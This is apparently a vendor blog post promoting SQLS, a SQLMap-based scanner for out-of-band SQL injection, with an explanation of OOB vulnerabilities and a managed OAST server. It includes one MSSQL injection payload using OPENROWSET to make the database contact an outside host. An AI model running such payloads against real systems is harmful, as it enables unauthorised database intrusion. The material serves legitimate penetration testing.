Hunting Down Out-of-Band (OOB) SQL Injection Vulnerabilities With SQLS
SQLS (SQLSCANNER) is a powerful SQL Injection scanner that employs five distinct techniques to identify Full and Blind (including Time-based & Out-of-Band) SQL injection vulnerabilities. Powered by SQLMap, it offers comprehensive coverage for detecting CWE-89 issues that you can't find with other traditional tools.
As a penetration tester, our main goal is to identify as many potential security vulnerabilities in targets as possible. Often meeting tight deadlines and experiencing time constraints, most pentesters have to refer to automated tooling to still get every component tested.
But what if these automated tools have limitations? Or aren't capable of providing coverage for certain unique cases? We've come across these common challenges too and we are solving them (and still are) with BLACKBIRD Pentesting Suite.
Understanding Out-of-Band (OOB) SQL Injection
Out-of-band (OOB) vulnerabilities are generally harder to spot as they need an external server. The root cause is a vulnerable component within a system or application that allows attackers to create outbound TCP connections (such as DNS queries or HTTP requests) to an arbitrary source (for example: a self-deployed OAST server).
If you'd like to dive deeper into what Out-of-Band (OOB) vulnerabilities are, we highly recommend you refer to this article: What Are Out-of-Band (OOB) Web Security Vulnerabilities?
Out-of-band (OOB) SQL injection vulnerabilities often resolve around us sending a malicious payload that would trick the database into making an external DNS query or HTTP request.
Here is an example of an OOB SQL Injection payload for Microsoft SQL Server (MSSQL):
1'; SELECT * FROM OPENROWSET('SQLOLEDB', '//demo.x7.rs', 'SELECT 1')
Traditional SQL Injection vulnerability scanners often lack coverage for Blind Out-of-Band SQL Injection vulnerabilities, often because it requires an external OAST server.
BLACKBIRD is a pentesting suite and it comes out of the box with a managed 4-character domain OAST server. So we decided to fix this, and we've solved this.
Introducing SQLS: The Managed SQL Injection (SQLi) Vulnerability Scanner
SQLS is a powerful SQL Injection vulnerability scanner that deploys 5 attack techniques to identify full and blind (such as Time-based & Out-of-Band) SQL injection vulnerabilities. It is powered by an open-source, reputable tool, SQLMap.
We've built further upon SQLMap to integrate with your private OAST server that comes out of the box with your BLACKBIRD license. This integration allowed us to add new payloads to SQLMap to help detect Out-of-Band (OOB) SQL injection vulnerabilities, a blind type of SQLi vulnerability that's often missed by pentesters.
SQLS also includes advanced payloads with Web Application Firewall (WAF) bypasses for popular firewalls like Cloudflare, Akamai, etc., further increasing your coverage and helping you find more SQLi vulnerabilities.
BLACKBIRD OAST Server Integration
Your OAST Server is a managed private OAST server that can be set up in less than a minute. We host your OAST server so that you do not have to take care of it. All you have to do is pick a canary token that you like.
Afterward, you can easily receive DNS, HTTP and HTTPS invocations and consult them right from your dashboard!
Want to learn more? Read the documentation or explore the interactive demo!
Conclusion
Out-of-band (OOB) vulnerabilities are generally harder to spot, but that shouldn't always be! You as a pentester must set yourself up to work with the latest and most powerful pentesting tools to significantly decrease your chances of missing out on security vulnerabilities!
You can try out SQLS for 7 days completely for free! All you have to do is start your trial! You can cancel at any given moment from your profile!
